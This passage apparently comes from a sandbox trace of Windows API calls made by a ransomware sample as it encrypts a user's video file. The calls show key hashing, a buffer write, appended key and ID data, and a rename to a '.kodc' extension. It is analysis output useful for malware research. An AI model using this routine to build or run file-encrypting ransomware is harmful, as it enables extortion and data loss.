lpFileSize=0x9e2fb40*=65924) returned 1 [0099.880] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0099.884] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1015e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.884] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0099.885] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.885] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.885] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.885] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x10184, lpOverlapped=0x0) returned 1 [0099.886] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.886] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0099.886] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.886] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0099.886] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x6932f0) returned 1 [0099.887] CryptCreateHash (in: hProv=0x6932f0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0099.887] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0099.887] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0099.887] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0099.887] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0099.887] GetLastError () returned 0x0 [0099.887] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0099.887] CryptReleaseContext (hProv=0x6932f0, dwFlags=0x0) returned 1 [0099.887] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.887] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0099.887] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0099.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.888] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0099.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0099.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10180) returned 0x9ba6d90 [0099.888] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0099.888] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0099.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0099.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0099.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0099.888] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c028 [0099.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a70 [0099.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9c070 [0099.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a88 [0099.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ab8 [0099.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ad0 [0099.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0099.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0099.889] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0099.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333b018 [0099.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ab8 | out: hHeap=0x630000) returned 1 [0099.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ad0 | out: hHeap=0x630000) returned 1 [0099.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0099.889] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec90 [0099.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ad0 [0099.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0099.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7ab8 [0099.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec40 [0099.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0099.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0099.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0099.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0099.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0099.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0099.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ad0 | out: hHeap=0x630000) returned 1 [0099.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ab8 | out: hHeap=0x630000) returned 1 [0099.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0099.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0099.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.890] GetCurrentThreadId () returned 0x42c [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba5fa8 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec40 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.891] GetCurrentThreadId () returned 0x42c [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0099.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0099.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0099.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x33183f8 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69ba50 [0099.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0099.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec80 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec50 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecb0 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec60 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ab8 [0099.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec80 [0099.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec10 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ced00 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cece0 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec70 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ad0 [0099.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cece0 | out: hHeap=0x630000) returned 1 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0099.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ced00 | out: hHeap=0x630000) returned 1 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7aa0 [0099.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec70 | out: hHeap=0x630000) returned 1 [0099.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a28 [0099.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0099.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0099.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec50 | out: hHeap=0x630000) returned 1 [0099.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb79c8 [0099.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ae8 [0099.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb79c8 [0099.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0099.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec60 [0099.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec90 | out: hHeap=0x630000) returned 1 [0099.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32ad2c0 [0099.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec60 | out: hHeap=0x630000) returned 1 [0099.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32ad520 [0099.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ab8 | out: hHeap=0x630000) returned 1 [0099.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ab8 [0099.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec80 | out: hHeap=0x630000) returned 1 [0099.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x9b96968 [0099.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0099.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c658 [0099.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb79c8 | out: hHeap=0x630000) returned 1 [0099.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x32cef08 [0099.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad520 | out: hHeap=0x630000) returned 1 [0099.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x9b8c428 [0099.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecb0 | out: hHeap=0x630000) returned 1 [0099.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x9b8c540 [0099.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ab8 | out: hHeap=0x630000) returned 1 [0099.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x6948b0 [0099.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0099.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec40 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6932f0 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6948b0 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ae8 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a28 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ad0 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7aa0 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0099.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a88 | out: hHeap=0x630000) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c070 | out: hHeap=0x630000) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33183f8 | out: hHeap=0x630000) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0099.896] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba6d90*, nNumberOfBytesToWrite=0x1017f, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba6d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x1017f, lpOverlapped=0x0) returned 1 [0099.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba6d90 | out: hHeap=0x630000) returned 1 [0099.896] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x10184, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.896] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0099.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0099.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x9b9c950 [0099.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x9b9c950, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0099.897] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333b018 [0099.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.897] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.897] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.897] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.897] CloseHandle (hObject=0x5cc) returned 1 [0099.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0099.900] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0099.900] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0099.900] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0HK4tuqZb.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0hk4tuqzb.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\0HK4tuqZb.mp4.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\0hk4tuqzb.mp4.kodc")) returned 1 [0099.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.901] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.901] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.902] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb76c8940, ftCreationTime.dwHighDateTime=0x1d5c147, ftLastAccessTime.dwLowDateTime=0x10a8e410, ftLastAccessTime.dwHighDateTime=0x1d5baf7, 